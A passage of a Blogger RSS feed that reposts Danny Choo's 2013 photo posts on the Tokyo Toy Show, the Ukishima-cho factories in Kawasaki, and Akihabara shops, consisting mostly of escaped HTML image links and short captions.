/&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173212"&gt;&lt;img alt="9075466728_3b1081bf95_o" height="523" src="http://farm8.staticflickr.com/7408/9075466728_3b1081bf95_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Anpanman face bread at the Anpanman Garden booth.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173214"&gt;&lt;img alt="9075467352_8a3901de33_o" height="523" src="http://farm8.staticflickr.com/7349/9075467352_8a3901de33_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173216"&gt;&lt;img alt="9073237711_a8b5fde8eb_o" height="523" src="http://farm8.staticflickr.com/7430/9073237711_a8b5fde8eb_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The Sega Toys booth.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173218"&gt;&lt;img alt="9075468156_6361f72392_o" height="523" src="http://farm6.staticflickr.com/5333/9075468156_6361f72392_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Jewelpod Diamond Premium - a smart phone toy for the young girls.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173220"&gt;&lt;img alt="9073238565_3f96d02ee3_o" height="523" src="http://farm6.staticflickr.com/5454/9073238565_3f96d02ee3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Anpanman inspired bento boxes.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173222"&gt;&lt;img alt="9075468972_295257811d_o" height="930" src="http://farm4.staticflickr.com/3684/9075468972_295257811d_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Plushies from the Nyanko Daisenso game [にゃんこ大戦争] - available on &lt;a href="https://itunes.apple.com/jp/app/nyanko-da-zhan-zheng/id547145938?mt=8"&gt;iTunes&lt;/a&gt; and &lt;a href="https://play.google.com/store/apps/details?id=jp.co.ponos.battlecats&amp;amp;hl=ja"&gt;Google Play&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173105"&gt;&lt;img alt="9073239355_7c49a808cf_o" height="523" src="http://farm4.staticflickr.com/3735/9073239355_7c49a808cf_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Big Sight!&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173228"&gt;&lt;img alt="9075469748_b8fcd517d3_o" height="429" src="http://farm3.staticflickr.com/2848/9075469748_b8fcd517d3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://mirai.fm/"&gt;Read more about Mirai Suenaga &amp;gt;&amp;gt;&amp;gt;&lt;/a&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/dannychoo_com_main_article_feed_eng/~4/u-X-xm0G3_k" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/international-tokyo-toy-show.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-9170208262790139020</guid><pubDate>Thu, 20 Jun 2013 19:29:00 +0000</pubDate><atom:updated>2013-06-20T14:29:07.477-05:00</atom:updated><title>Ukishima-cho Factories</title><description>&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html"&gt;Ukishima-cho Factories&lt;/a&gt;: &lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173078"&gt;&lt;img alt="9056698050_c7c12fa5cb_o" height="523" src="http://farm8.staticflickr.com/7323/9056698050_c7c12fa5cb_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;There is another very cool place in Japan that photographers may want to visit thats hardly documented - the factories of Ukishima-cho.&lt;br /&gt;&lt;br /&gt;I've always known that there was a place filled with factories but never knew where it was until we just happened to drive past it last night.&lt;br /&gt;&lt;br /&gt;Ukishima-cho [浮島町] is located in Kawasaki in a landfill area that is covered with factories as far as the eye can see.&lt;br /&gt;&lt;a href="http://maps.google.com/maps?q=35.5273,%20139.7763&amp;amp;ie=UTF8&amp;amp;z=17&amp;amp;source=embed"&gt;View location with Google Maps&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;However, as its not really a tourist or residential area (2 registered people live on the island), if you want to visit then you need a car or long walk from Kojima Shinden station [小島新田] on the Keikyu Daishi-line. Would be better if you can take a rental bicycle as the area is huge.&lt;br /&gt;&lt;br /&gt;If you go on a clear night that would be best as the plumes of smoke look clearer - if you go on a windy night then your timelapse videos would look awesome.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173093"&gt;&lt;img alt="9056702622_b033884e23_o" height="500" src="http://farm6.staticflickr.com/5345/9056702622_b033884e23_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;There is a Japanese term to describe the appreciation of factories through photography and is actually called "Koujo-moe" [工場萌え] or "Factory Moe!"&lt;br /&gt;&lt;br /&gt;&lt;a href="http://buff.ly/17df0kq"&gt;This search result for Koujo Moe&lt;/a&gt; shows you how big this is in Japan.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173079"&gt;&lt;img alt="9054475371_53c7d98799_o" height="523" src="http://farm8.staticflickr.com/7288/9054475371_53c7d98799_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;I was driving on the highway at the time so could only stop in rest pits thus I was only able to get a few photos. Will be going back there in the Summer to spend more time in the area though. Maybe a bunch of us can go together!&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173080"&gt;&lt;img alt="9056703586_83a427693a_o" height="523" src="http://farm8.staticflickr.com/7378/9056703586_83a427693a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Uploaded a couple of these as wallpapers to my &lt;a href="http://www.flickr.com/photos/dannychoo/tags/ukishima/"&gt;Flickr Stream&lt;/a&gt;. I left the ISO settings etc in there too. The Sony NEX series handles low light well with minimum noise levels. Although I did tweak these a bit in Lightroom.&lt;br /&gt;&lt;br /&gt;Didn't have a tripod with me and even if I did, it was too dangerous to use from the top of the highway &amp;gt;&amp;lt;&lt;br /&gt;&lt;br /&gt;If you are going to Ukishima-cho to take photos from ground level then take a tripod - you should be able to get less grainy shots than these.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173081"&gt;&lt;img alt="9056704878_72d647db0a_o" height="523" src="http://farm4.staticflickr.com/3747/9056704878_72d647db0a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173082"&gt;&lt;img alt="9056705400_e69888e608_o" height="523" src="http://farm8.staticflickr.com/7383/9056705400_e69888e608_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173083"&gt;&lt;img alt="9056706186_36ac07b555_o" height="523" src="http://farm4.staticflickr.com/3667/9056706186_36ac07b555_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173084"&gt;&lt;img alt="9054478871_c0dd040ece_o" height="523" src="http://farm6.staticflickr.com/5549/9054478871_c0dd040ece_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173085"&gt;&lt;img alt="9054479925_281cd60d5d_o" height="523" src="http://farm3.staticflickr.com/2814/9054479925_281cd60d5d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173086"&gt;&lt;img alt="9054480735_cf74c370e5_o" height="523" src="http://farm3.staticflickr.com/2876/9054480735_cf74c370e5_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173087"&gt;&lt;img alt="9054481311_545034f6a1_o" height="523" src="http://farm4.staticflickr.com/3789/9054481311_545034f6a1_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173088"&gt;&lt;img alt="9056710060_7523627f9d_o" height="930" src="http://farm4.staticflickr.com/3822/9056710060_7523627f9d_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173089"&gt;&lt;img alt="9056710680_83bb6ff2b4_o" height="523" src="http://farm4.staticflickr.com/3679/9056710680_83bb6ff2b4_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173090"&gt;&lt;img alt="9054484019_d919c61b22_o" height="930" src="http://farm6.staticflickr.com/5539/9054484019_d919c61b22_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173092"&gt;&lt;img alt="9056712732_800256478d_o" height="523" src="http://farm6.staticflickr.com/5512/9056712732_800256478d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;View from the car as we zoom back to base.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html#image_173091"&gt;&lt;img alt="9054485307_8b56b58f3a_o" height="429" src="http://farm8.staticflickr.com/7311/9054485307_8b56b58f3a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://mirai.fm/"&gt;Read more about Mirai Suenaga &amp;gt;&amp;gt;&amp;gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/ukishima-cho-factories.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-5543559112128146994</guid><pubDate>Thu, 20 Jun 2013 19:29:00 +0000</pubDate><atom:updated>2013-06-20T14:29:03.253-05:00</atom:updated><title>Akihabara Shops 8</title><description>&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html"&gt;Akihabara Shops 8&lt;/a&gt;: &lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172883"&gt;&lt;img alt="9036665485_acb2e9d36a_o" height="523" src="http://farm8.staticflickr.com/7411/9036665485_acb2e9d36a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Akihabara - the worlds largest concentrated area dedicated to anime, games, manga, cosplay, robot, hobby and computing shops. Today we take our regular gander around the otaku haven in this weeks instalment of &lt;a href="http://www.dannychoo.com/en/posts/tag/akihabarashops/landscape"&gt;Akihabara Shops&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Today we take a lookie at places including Yodobashi Camera, Traders, Dospara, Sofmap, Koubu Inari Shrine [講武稲荷神社], Akihabara Crane Lab, K-books, Kotobukiya, Animate and other small stores located in the back streets of Akihabara.&lt;br /&gt;&lt;br /&gt;First photo - huge poster for the up n coming eroge title &lt;a href="http://www.dannychoo.com/en/post/26860/Amairo+Islenauts.html"&gt;Amairo Islenauts&lt;/a&gt; - my team &lt;a href="http://www.dannychoo.com/en/post/26931/Amairo+Clock.html"&gt;makes the official mobile app&lt;/a&gt; that helps you learn Japanese ^o^&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172884"&gt;&lt;img alt="9036666119_4fcb12c8fc_o" height="523" src="http://farm6.staticflickr.com/5463/9036666119_4fcb12c8fc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Checking out the back streets of Akihabara is always important as thats where most of the gems are.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172885"&gt;&lt;img alt="9038891410_449623615a_o" height="523" src="http://farm8.staticflickr.com/7294/9038891410_449623615a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Akihabara is also for the health conscious too, filled with software and products to keep in "tip" top shape.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172886"&gt;&lt;img alt="9038892038_a553fd5956_o" height="523" src="http://farm8.staticflickr.com/7393/9038892038_a553fd5956_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26938/Attack+on+Titan.html"&gt;Shingeki&lt;/a&gt; fever taking Japan by storm.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172887"&gt;&lt;img alt="9036667587_d322bd3e6a_o" height="523" src="http://farm8.staticflickr.com/7289/9036667587_d322bd3e6a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Shingeki no Kyojin Manga.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172888"&gt;&lt;img alt="9036668285_9a8a10dc5d_o" height="523" src="http://farm8.staticflickr.com/7342/9036668285_9a8a10dc5d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The main street in Akihabara is called Chuo Dori.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172890"&gt;&lt;img alt="9038893774_c3ea88a781_o" height="523" src="http://farm8.staticflickr.com/7373/9038893774_c3ea88a781_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Cuties in the eroge &lt;a href="http://www.lumpofsugar.co.jp/product/magicha/"&gt;Magical Charming&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-C9TeN_vO1QQ"&gt;&lt;img alt="" src="http://img.youtube.com/vi/C9TeN_vO1QQ/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-C9TeN_vO1QQ"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172891"&gt;&lt;img alt="9038894236_b97aa1593a_o" height="523" src="http://farm4.staticflickr.com/3743/9038894236_b97aa1593a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;No doubt that the cutest girls in Japan are in Akihabara - more of them in eroge &lt;a href="http://www.cuffs-sphere.jp/products/berrys/"&gt;Berrys&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-awHL4EM5cg4"&gt;&lt;img alt="" src="http://img.youtube.com/vi/awHL4EM5cg4/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-awHL4EM5cg4"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172889"&gt;&lt;img alt="9036669799_190f4a0f06_o" height="523" src="http://farm4.staticflickr.com/3760/9036669799_190f4a0f06_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Haruhi and Shana DVD's.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172892"&gt;&lt;img alt="9038895134_51553da316_o" height="523" src="http://farm3.staticflickr.com/2833/9038895134_51553da316_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Where do you watch your anime watch list?&lt;br /&gt;This post contains a poll, &lt;a href="http://www.dannychoo.com/en/posts/26961#poll-2654"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172893"&gt;&lt;img alt="9036670791_06334e539a_o" height="523" src="http://farm4.staticflickr.com/3767/9036670791_06334e539a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Nagashi Soumen in the comfort of your own home - for only &lt;a href="http://finance.yahoo.com/currency/convert?amt=1500&amp;amp;from=JPY&amp;amp;to=USD&amp;amp;submit=Convert"&gt;1,500 yen&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-OdNvvqkdp9Y"&gt;&lt;img alt="" src="http://img.youtube.com/vi/OdNvvqkdp9Y/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-OdNvvqkdp9Y"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172894"&gt;&lt;img alt="9036671277_e335bb19ef_o" height="930" src="http://farm8.staticflickr.com/7318/9036671277_e335bb19ef_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172895"&gt;&lt;img alt="9036671901_3bf9b4e057_o" height="523" src="http://farm6.staticflickr.com/5324/9036671901_3bf9b4e057_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Akihabara - where you can find both useful and maybe not so useful gadgets.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172896"&gt;&lt;img alt="9038897356_e647fe9be3_o" height="523" src="http://farm8.staticflickr.com/7454/9038897356_e647fe9be3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172897"&gt;&lt;img alt="9038897802_1389caf574_o" height="930" src="http://farm6.staticflickr.com/5466/9038897802_1389caf574_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Katana brollies for the ninja inside of you. Next is to &lt;a href="http://www.dannychoo.com/en/post/25848/How+to+Become+a+Ninja.html"&gt;learn how to become a Ninja&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172898"&gt;&lt;img alt="9038898254_4a989d437d_o" height="523" src="http://farm6.staticflickr.com/5470/9038898254_4a989d437d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Quite a few small shrines hidden in the back streets of Akihabara.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172899"&gt;&lt;img alt="9036673667_88d60f7b23_o" height="523" src="http://farm6.staticflickr.com/5538/9036673667_88d60f7b23_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;If Mirai Millennium becomes a game it will have a very retro look and feel about it.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172900"&gt;&lt;img alt="9038899314_451c0ae9bf_o" height="930" src="http://farm3.staticflickr.com/2889/9038899314_451c0ae9bf_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Cutie overload in &lt;a href="http://nanawind.jp/product/prj02/"&gt;ALIA'S CARVIVAL&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172901"&gt;&lt;img alt="9038899736_6f9bcee4f7_o" height="523" src="http://farm4.staticflickr.com/3769/9038899736_6f9bcee4f7_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Japanese eroge culture means no more roneriness.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172902"&gt;&lt;img alt="9036675367_8bf6abb1dd_o" height="523" src="http://farm4.staticflickr.com/3740/9036675367_8bf6abb1dd_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Even more (more?!) cuties in &lt;a href="http://hearts.amuse-c.jp/anna/"&gt;Koi Saku Miyako ni Ai no Yakusoku wo ~Annaffiare~&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-8hqYySQznw8"&gt;&lt;img alt="" src="http://img.youtube.com/vi/8hqYySQznw8/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-8hqYySQznw8"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172903"&gt;&lt;img alt="9036675809_5e1cc8271f_o" height="523" src="http://farm8.staticflickr.com/7401/9036675809_5e1cc8271f_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.project-navel.com/otomeriron/"&gt;Otome Riron to Sono Shuuhen -Ecole de Paris-&lt;/a&gt; - illustrated by &lt;a href="http://www.jokertype.com/"&gt;Nishimata Aoi-sensei&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-TovSwrgGYUw"&gt;&lt;img alt="" src="http://img.youtube.com/vi/TovSwrgGYUw/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-TovSwrgGYUw"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172904"&gt;&lt;img alt="9036676401_e486ae72bd_o" height="523" src="http://farm6.staticflickr.com/5518/9036676401_e486ae72bd_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.astronauts.co.jp/alya/grimoire/"&gt;Madousho no Shisho - Librarian of Grimoire&lt;/a&gt; out at the end of this month.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-XnzZnjgZ244"&gt;&lt;img alt="" src="http://img.youtube.com/vi/XnzZnjgZ244/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-XnzZnjgZ244"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172905"&gt;&lt;img alt="9038901908_4e7e386ff3_o" height="523" src="http://farm4.staticflickr.com/3790/9038901908_4e7e386ff3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.sumikko-soft.com/natsukuru/"&gt;Natsukumo Yururu&lt;/a&gt; also out at the end of this month.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-xdGFuD2TkW4"&gt;&lt;img alt="" src="http://img.youtube.com/vi/xdGFuD2TkW4/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-xdGFuD2TkW4"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172906"&gt;&lt;img alt="9036677267_079165d3ac_o" height="523" src="http://farm8.staticflickr.com/7397/9036677267_079165d3ac_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Akiba Rangers - Robots in Disguise.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172907"&gt;&lt;img alt="9038902774_f8f29470f4_o" height="523" src="http://farm3.staticflickr.com/2854/9038902774_f8f29470f4_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172908"&gt;&lt;img alt="9038903390_949d63c566_o" height="523" src="http://farm6.staticflickr.com/5509/9038903390_949d63c566_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Akihabara - something for all tastes...&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172909"&gt;&lt;img alt="9036678975_9873e589de_o" height="523" src="http://farm6.staticflickr.com/5465/9036678975_9873e589de_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Load of Eroge available at Sofmap.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172910"&gt;&lt;img alt="9036679501_1781c65ac5_o" height="523" src="http://farm8.staticflickr.com/7318/9036679501_1781c65ac5_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The latest figure releases - Figma and Nendoroids.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172911"&gt;&lt;img alt="9036679947_ab7f593a56_o" height="523" src="http://farm8.staticflickr.com/7348/9036679947_ab7f593a56_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Gunpla Galore. Me not in touch with the Gunpla scene of late. Are MG builds up to the same quality as PG?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172912"&gt;&lt;img alt="9038905566_74338d5c63_o" height="523" src="http://farm6.staticflickr.com/5494/9038905566_74338d5c63_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172913"&gt;&lt;img alt="9038906078_b9953c8401_o" height="523" src="http://farm4.staticflickr.com/3668/9038906078_b9953c8401_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Review of these two cuties in the &lt;a href="http://www.dannychoo.com/en/posts/tag/cu-poche/landscape"&gt;Cu-Poche&lt;/a&gt; category.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172914"&gt;&lt;img alt="9038906500_2d3d9c9277_o" height="523" src="http://farm8.staticflickr.com/7374/9038906500_2d3d9c9277_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Anime characters being shop assistants &lt;a href="http://www.dannychoo.com/en/post/26769/Kinokuniya+x+Mirai+Suenaga.html"&gt;is all the rage&lt;/a&gt; ^o^&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172915"&gt;&lt;img alt="9038907140_9d9c2be54c_o" height="523" src="http://farm6.staticflickr.com/5329/9038907140_9d9c2be54c_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Sleeves for your trading card games, &lt;a href="http://moekana.com/"&gt;Moekana&lt;/a&gt; and &lt;a href="http://moekanji.com/"&gt;Moekanji&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;And if you want Mirai Suenaga sleeves then &lt;a href="http://www.dannychoo.com/en/post/26483/Mirai+Card+Sleeves.html"&gt;we got you covered&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172916"&gt;&lt;img alt="9036682715_7d83ee77eb_o" height="523" src="http://farm4.staticflickr.com/3691/9036682715_7d83ee77eb_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172917"&gt;&lt;img alt="9036683263_4e4537624d_o" height="930" src="http://farm8.staticflickr.com/7413/9036683263_4e4537624d_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Dollfie Dream Sakuya Izayoi up for grabs.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172918"&gt;&lt;img alt="9036684057_9fbc418dfc_o" height="523" src="http://farm8.staticflickr.com/7350/9036684057_9fbc418dfc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Dakimakura brides.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172919"&gt;&lt;img alt="9038909792_fcfc4e8bc3_o" height="523" src="http://farm4.staticflickr.com/3720/9038909792_fcfc4e8bc3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Light novels - many of which have been or will become anime titles.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172920"&gt;&lt;img alt="9036685399_7bc81df6ca_o" height="523" src="http://farm8.staticflickr.com/7303/9036685399_7bc81df6ca_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172921"&gt;&lt;img 